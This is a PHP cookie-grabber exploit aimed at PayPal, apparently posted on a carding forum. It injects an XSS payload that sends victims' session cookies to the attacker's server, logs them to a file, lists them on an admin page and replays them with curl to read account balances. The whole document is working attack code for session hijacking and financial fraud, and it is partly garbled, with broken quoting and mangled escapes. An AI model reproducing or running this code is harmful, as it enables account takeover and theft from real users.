PayPal XSS + Cookie Grabber Exploit Private
<?php /*
Website: <a href="http://carderx.com" target="_blank">http://carderx.com</a>
PayPal Exploit (XSS)
Coded by: mainl00p
*/
define("PPLOGIN_URL", "https://www.paypal.com/en");
define("PPXSS_URL", "https://www.paypal.com/it/cgi-bin/webscr?cmd=_shop-search-ext&search_cat_name="/>'&q="&search_cat=®ion="><iframe onload=alert(0)/>");
define("COOKIE_FILE", "carderX.txt"); // A COOKIE FILE (WHERE TO STORE THE COOKIES)
define("EXPLOIT_URL", "http://carderx.com/temp/exploit.php"); // HERE YOU NEED TO PUT YOUR GRABBER'S URL
// I put automatically those fields (_t must be there, it can have random value, I preferred NULL) function doXSS($Vector)
{ echo "<form id="sui_m" name="sui_m" method="post" class="" action="" . PPXSS_URL . "">
<input type="hidden" name="_t" value=""/>
<input type="hidden" name="_fl" value="1" />
<input type="hidden" name="atoi" value="0" />
<input type="hidden" name="min" value="0" />
<input type="hidden" name="max[0]" value="" />
<input type="hidden" name="load" value="$Vector" />
</form>
<script type="text/javascript">document.getElementById("sui_m").su bmit();</script>";
}
// Gets the cookie from GET parameter returned by XSS and stores it in file
function getCookie() {
if (isset($_GET["c"])) {
$f = fopen(COOKIE_FILE, "a");
$c = base64_encode($_GET["c"]);
fwrite($f, $c . "n");
fclose($f);
}
}
// Reads the cookie from file
function readCookies() {
$c = file_get_contents(COOKIE_FILE);
return explode("n", $c); }
// Logs in and checks the ballance
function check($Cookie) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, PPLOGIN_URL);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $Cookie);
$s = curl_exec($ch);
if (preg_match("/Ballance: (.*)</b>/i", $s, $z))
return $z[1];
return NULL;
}
// MAIN
if (isset($_GET["admin"]) && $_GET["admin"] == "true") {
$ck = readCookies();
echo "<table style="font-size: 12px;">n";
echo "<tr style="background-color: red; color: white;"><td style="width: 50px;"><b>Id</b></td><td style="width: 700px;"><b>Cookie</b></td><td><b>Check</b></td></tr>n";
$i = 0;
foreach ($ck as $c) {
echo "<tr style="background-color: grey;"><td>" . $i . "</td><td>$c</td><td><a href="?check=" . base64_encode($c) . "">Check</a></td></tr>n";
}
die("");
}
if (isset($_GET["check"]) && $_GET["check"] != "") {
$cz = check(check($_GET["check"]));
if ($cz != NULL) echo "Ballance: " . $cz;
else
echo "Error logging in!";
die("");
}
$XSS = ""><script>window.location=" . EXPLOIT_URL . "?c=" . "" document.cookie;</script>"; doXSS($XSS); ?>
?>
|
Statistics
Total online: 1 Guests: 1 Users: 0
|